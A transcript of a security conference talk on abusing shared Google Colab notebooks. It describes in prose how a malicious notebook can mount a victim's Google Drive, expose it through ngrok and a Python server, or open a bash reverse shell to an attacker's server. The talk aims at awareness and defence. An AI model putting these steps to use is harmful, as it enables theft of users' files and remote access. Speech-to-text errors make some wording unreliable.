 Let me, I will introduce Antonio. Well, I'd like to welcome to the stage Antonio Piazza, who's going to present careful who you collab with, abusing Google Collaboratory. Antonio Piazza, hailing from Cleveland, Ohio. USA is a purple team leader and offensive security engineer at NVIDIA. Following his stint as a US Army Human Intelligence Collector, you and I should talk after your talk. We, he worked as a defense contractor operator on an NSA red team. So he's an intimately familiar with spies hacking and nerd stuff. And Antonio is a passionate, is passionate about all things related to macOS security and hacking. Thus spends his days researching macOS internals and security as well as writing free, open-source red team tools. For use in the defense against the dark arts. Oh, that's, that sounds cool. As of late, he has been planning to implement machine learning into red teaming with his NVIDIA colleagues. So please welcome Antonio. Oh, sorry, I have to give you access, I guess. Let me do that real quick. I was looking for your name and not your handle. There we go. Okay, you have access. Make sure to pick up a microphone to get megaphone access. Just point your pointer at one of the microphones and it'll change from a circle to a funny looking icon and then left click it to pick it up. Is that right? Left click, right click. It's not, I don't know why my icon's not changing. He has megaphone enabled, so he's good. Okay. Yeah. These controls, that'd be wonderful. Okay. Thanks everyone, really appreciate you coming and listening to this. Can everyone hear me okay before I start going on? This is my first formal doing anything in VR so hopefully it goes well. I'm gonna be looking at my slides a lot so yell at me if something happens. So anyway, when I started this research I was toying around with the idea of creating a startup that would provide a service to artists that would allow them to gain inspiration through AI. That was kind of the premise of the startup idea I had. And I wanted to start with music because that's where my passion is. The idea is that a musician, or the idea was that a musician who needs inspiration for writing their next song could submit some samples of their music or of songs from which they wish to emulate or they gain inspiration from. And the AI would then throw together a bunch of riffs similar to but not the same as the style that the user submitted. I started using Google collaborator and getting involved in the AI art music community including the Dotabots Discord channel and reading white papers concerning sample RNN, not having a great GPU on my own computer at the time and they were super expensive and hard to get. Not anymore thanks to me working at NVIDIA. Some AI researchers in the community directed me to Google Collaboratory. So I started playing with it and found it to be a great tool for AI collaboration and you get a free GPU, which is really nice. So this research didn't start with anything to do with security. Next slide, please. Then a researcher in the Dotabots Discord who was involved in another project called Open AI Jukebox. This platform allows the user to train the AI by feeding it a song and whatever written lyrics the user wishes and the AI will give you and return a song where the artist sings the lyrics you provide. So I was playing around and trying to get Elvis to sing the lyrics of Sir Mr. Missalots Baby Got Back and the style of Suspicious Minds. Next slide, please. And a researcher, Brokkaloo, from the AI Jukebox Research Project, helped me out by tweaking some of the configurations in my Google Cloud file, which he shared with me via this Discord message. I opened the filing in Collab as normal and again as normal and began the process of mounting my Google Drive in Collab. And this is when it hit me. When I mounted my Google Drive, this prompt came up on the screen and it said, I don't know if you can read it, but it says this notebook is requesting access to your Google Drive files. If you're running access to Google Drive, we'll permit code executed in the notebook to modify files in your Google Drive. Make sure to review notebook code prior to allowing the access. And that's where security research began for this. So next slide, please. And again, the talk is titled Careful Who You Collab With of using Google Collaboratory. Next slide, please. And I am Antonio Piazza. I go by Ant-Man 1P on the Twitters. I'm an offensive security engineer. Most of my security experience is strictly red teaming. I've worked at Zoom, Box, the Cleveland Clinic, on an NSA red team as a defense contractor. And now I am the purple team leader in Vidya on the threat operations team. And that Odin logo down there are some stickers. If you're here at DEFCON, I'm here. I'll be down in the AI village after this talk and I'll hand them out if you want some. I'm also in my final course of the Master's of Science in Information Security Engineering Program at Sands Technology Institute. I'm a father of five, a husband, and again, I love music. Next slide, please. So the agenda here is pretty brief. We're gonna discuss what Google Collaboratory is, just to ensure some of you do don't know just whom you might be familiar. We're gonna talk about how we can abuse Google Cloud and then we're just gonna kind of conclude. Next slide, please. So what is Google Collaboratory? I'll let Google define it because I think they best describe it in detail. Collaboratory or Colab for short is a product from Google Research. Colab allows anybody to write and execute arbitrary Python code through the browser and is especially well suited to machine learning, data analysts, and education. More technically, Colab is a hosted Jupyter notebook service that requires no setup to use while providing access free of charge through computing resources, including GPUs. Colab resources are not guaranteed and not unlimited and the usage limits sometimes fluctuate. So you actually, if you're interested in having reliable access and better resources, you could purchase Colab Pro, which is I think about $50 a month. What is the difference between Jupyter and Colab? Jupyter is an open source project in which Colab is based. Colab allows you to use and share Jupyter notebooks with others without having to download and install or run anything. So that's the example I gave of, you know, Rockaloo sharing Colab file with me. He was actually sharing a Jupyter notebook file. Next slide, please. How is Colab normally used? You can write your own notebooks, which are stored in your Google account, Google Drive. Basically, you write Python code in a Jupyter notebook cell and you execute the cells by pushing the execute button. When you open or start a notebook, you connect it to a Colab runtime and that's where you get your GPU and other resources and they start to spin up and start running. And you also may connect your notebook to your Google Drive. So in the slide here, the picture I got arrows from a Jupyter cell and you can see the little black play button, which is how you run a cell. And then on the upper right hand corner, this is showing you your resources usage for your runtime. Next slide, please. How is Colab normally used? Kind of continuing. You can import Python libraries, just as you can normally do in Python. You can install dependencies with PIP and you can clone Git repos all into these Jupyter notebook cells. Next slide, please. You also have a Colab terminal. So once connected to the Colab runtime, you have a terminal that you can use to run shell commands and once connected to Drive, you can navigate the connected Google Drive file system. Question, where is my code executed? What happens to my execution state if I close the browser window? The code is executed in a virtual machine, private to your account. Virtual machines are deleted when idle for a while and have a minimum lifetime enforced by the Colab service. I haven't sat and tried to figure out what that time is, but that's something I'll probably do in the future. It seems to last a while as long as you're active. Next slide, please. Finally, I wanna touch on system aliases. So Jupyter has a number of system aliases or basically command shortcuts to common operations such as LS, cat, PS, kills, just normal, you know, NICs, built in commands. You can execute these from the Jupyter notebook cell by adding the bang or the exclamation point before the command. So bang LS will run the LS command. Next slide, please. All right, so how is this abusable? Let's recap it. If I'm an adversary and I share a collab file with someone, a Jupyter notebook or someone, if they choose to use my file, they must mount their Google Drive and execute it. So that's key, right? They would be executing the malicious code I sent them. The adversary could potentially access all of the contents of a victim's Google Drive and X will trade anything they choose at that point. The adversary can edit the victim's collab files to create backdoors that might still exploit other users that the victim collaborates with. You can have a reverse shell on a collab virtual machine in the runtime we're talking about. You know, is there a possibility to do a VM escape? That's maybe. All this could be as simple as sending a phishing email with a link to a malicious collab file or sending a link to a malicious collab file in an AI community discord server, just like the ones I hang out in and kind of the way that Broccoli shared the file with me. I gotta say, the one he shared with me was not malicious. By the way, I scared him when he saw these slides. He thought like, oh my God, did I send you something malicious? I'm like, no, no, no. I just got my brain working like an adversary. So you can hide malicious code in Jupyter cells. You can hide it and get repos since you can clone get repos into your Jupyter notebook. So there's a number of ways. Next slide, please. So for a clear understanding, a wooden attacker might have access to, if they successfully gain access to a victim's collab runtime or their Google Drive. Here are the permissions that one grants when mounting a Google Drive for a collab session. If you're having a hard time seeing these, I can read them real quick, but it's like, see, edit, create, delete all of your Google Drive files, view the photos, videos, albums and your Google photos, retrieve mobile client configuration and experimentation, view Google people information such as profiles and contacts are basically all the contacts you have in your Google account, including your phone or your Gmail. See, edit, create and delete any of your Google Drive documents. Next slide, please. To see what an attacker might do, we can take a look at MITRE Atlas. So Atlas stands for adversarial threat landscape for artificial intelligence systems. It's a knowledge base of adversary tactics, techniques and case studies in learning systems based on real-world observations, demonstrations from machine learning red teams and security groups in the state of what's possible from academic research. Atlas is basically modified after the MITRE attack framework, which people are commonly more familiar with. And it's tactics and techniques are complementary to those MITRE attacks. So how can an attacker do this? Well, for initial access, we discussed phishing the AI community or ML research community via email or Discord servers. MITRE Atlas has a machine learning supply chain compromise technique under the initial access tactic that might make sense. So maybe we can add a sub-technique there for Jupyter Notebook sharing. Also, user execution under the execution tactic, so an attacker might hide a backdoor in a Jupyter cell or maybe hide a backdoor in a Git repo that the notebook clones. Next slide, please. This is an example here of a hiding malicious code in Jupyter Notebook cells. Here is code that on the left that will give an adversary access to the victims will drive. While an adversary shared this notebook, a victim might easily recognize that this is not AI ML, just this one on the left is just all for getting, for an adversary getting access to people drive. But some of the AI and ML notebooks are quite large, as you can see on the right, that's not even the whole thing. And I zoomed out as far as possible to take that screenshot. An adversary might be able to hide the malicious bits within normal machine learning code. So the image on the right is just one small piece from a collab project with an AI community member, that an AI community member shared with me. And nothing malicious in there, just an example of how much code there is that an adversary could hide malicious cells and malicious code in. Next slide, please. Okay, so this is the example of the malicious code by the numbers, right? So imagine you receive a link to a collab file and you open it. If you run all of this, you will give the sender access to all your files and you will drive via ngrock. So the first thing you do in the code is where the victim's gonna mount their Google Drive. And again, this is normal behavior for all collab files, right? Like in order to kind of persist and store the data created from running one of these, you have to store it somewhere and when you're in the cloud, you're gonna mount it or you're gonna store it. The next step, you're gonna W get ngrock tarball and untar it. The third step is you register your attacker ngrock API key. So it's a bit dangerous for an attacker to, I guess, hard code API key, but an attacker can always change it when they're done billaging or if they're unsuccessful with the attack. So it's not too bad. Step four is start a Python server on a specified port. So like 9999 in this case and then run ngrock on the same port in step five. Next slide, please. So this is a video demo. I don't know, were you able to be able to run the videos from this presentation? I don't know if that problem was solved or I don't know if anybody can hear me. Should be running right now. Oh, it's running. Okay, I can't see it, but I'll just go ahead. So the victim, again, will run the code the victim again will run the collab file, mount their drive so you can see, but off screen I'm picking up or picking my Gmail account and allowing the drive access as I showed in the image earlier. And now I could navigate the file system on the left if I wanted. So installing Python requests, don't really need it here but I wanna show how you can use PIP if needed. I do a PWD to show the content or the correct location of the Google Drive file system. And then I curl ifconfig.me to show my Cloud VM IP address. W get to download ngrock, tar to untar ngrock, run ngrock config to add my API key, run the Python server to serve the Google Drive root directory, run ngrock, and then on the attacker side, the attacker goes to the ngrock agents. Is there a way to like tilt my view so I can look up and see the slides I'm like looking down? Yes, move your mouth forward. Oh, there it is. Okay, oh, did something go wrong? No, it's just a minute, did you mind it any bit? No, no, you're okay, I think this kind of, so on the attacker side, the attacker goes to ngrock agents and you might have saw there the IP address of the agent matched what I got from the curling of Iconfig.me and then we're in so we can navigate the Google Drive system and download whatever you want from the victim. So that what you're seeing there is kind of like a browser in browser representation of the victim's Google Drive. Please, okay, so that was the example of being able to get into a victim's Google Drive and this one is a reverse shell example. It's really, it's two simple steps for this one. So basically mount the victim's Google Drive and then do a bash TCP reverse shell to the adversary C2 server IP address. And I didn't show a video for this, it's just so simple but you get the idea of what a reverse shell is gonna look like. Next slide, please. Okay, so knowing all this, what is the problem? So quickly GPUs are a little harder to find to supply chain issues, they're pretty expensive. Where a collab is free and even pro is cheap. AI and ML researchers are starting to use collab more and especially education sectors or universities are using something similar like these cloud based cheaper notebooks, runtime environments. And researchers are collaborating and sharing, right? This is a pretty exciting time where we're able to, someone like me who's not super schooled and AI and ML can get their start because there's just so many cool, so much cool research going on there and people are willing to share it and you can get to learn and how to do all the crazy cool AI stuff. Where I think the problem comes in is that most AI and ML researchers and developers are not security experts, right? So just kind of like at the beginning of software engineering, like nobody's really thinking about security. It took a while for that to change and we're kind of back like a square one with that. I think with AI and ML researchers, the good news is security has been around for a while and we kind of saw the mistakes from that were being made at the beginning with software engineering. So hopefully we can quickly jump in and start securing things in the machine learning and AI sector. So, and finally fishing is easy, right? Like I've been on a lot of red teams and it's a numbers game. If I send out 100 fish, I know I'm gonna get at least one as long as they all make it through, you know, your email filter, anything. That's never really been a problem. So it's scary, but how can we fix it? Well, ML researchers and people who are collaborating should read the code someone shares with them. Let that Google Drive Mount Warning remind you every time, like before I mount this. Let me look through and make sure this code is good and it's what I was expecting and nothing weird in there. And I know that's difficult because again, in that example code that could be in one of these, you know, notebooks, it might be difficult to find those needle in the haystack and especially if the researcher doesn't know what to look for. So, you know, that's one thing I think as security experts, we should probably start doing this, educating machine learning and AI researchers in what bad looks like, right? So this is me, hopefully getting something out into the security community and hopefully this will spread from the security community into the ML research and AI community and we'll start using your expertise to educate those folks on what bad looks like. So then they can search for that in their notebooks. Maybe develop a code sharing plug-in, you know, in Google Drive, maybe Google can do that or the open source community can do that. Next slide, please. With that, thanks again. This is really cool doing something for the first time in VR. Hopefully it's smoothly for everyone else. And again, I hope you got something out of this and please feel free to ask any questions. I know I'm probably out of time here, but hopefully you can answer some questions. This, should we fix it by Google or do you think it should be off the user basically to kind of watch themselves to make sure they don't download any malicious code? You know, it's funny because I've heard that question before basically, is this a problem that the users need to solve? Well, absolutely, but you know, if you think about it, it's a community, you know, security education has been trying to push the responsibility on the user which ultimately it is in the end, but like that working, you know, like our users listening and especially if you're, you know, securing a enterprise or, you know, a corporate network or something like, we would hope all the users would do diligence, but it just never turns out that way, right? Like I would love if every person would be super villageant when opening an email and not clicking on a link, right? But it just never happens. So yeah, I mean, I think there's always a end user responsibility, but ultimately, and I think, you know, we have to do our part as well as, you know, security experts. Should Google do anything? My opinion, they should have more than just that warning, but, you know, I've submitted several things to Google. I don't know, I don't try to pick on Google, but I use Google a lot, so I end up finding things. I've submitted things and, you know, I guess like, oh, that works as normal and I'm like, that doesn't seem like great security practice, but, you know, that's the response. I don't have an expectation that Google will do anything. I wish they would, but, you know, I think ultimately we're gonna have to rebuy on the open source community to develop some plugins or, again, help educate people. Next slide, please. I actually have one more slide. Sometimes I get, it's not really a question, but people want to hear the, maybe got back things with Elvis. I can play it if you want to. I don't know if that, when the smoothies, I hope, but. It's a work in progress, but it gets pretty crazy when the end, the AI starts singing in some alien language. It reminds me of the show Devs when the, they had the background weird noise of the quantum computer speaking, it's kind of spooky. But anyway, any other questions? All right, well, thanks a lot. Again, I really appreciate it. Thank you, Antonio, for your presentation. Have to be careful, I guess, who we collab with from here on out. I never thought of that Jupiter notebooks being used in that way. That's quite clever.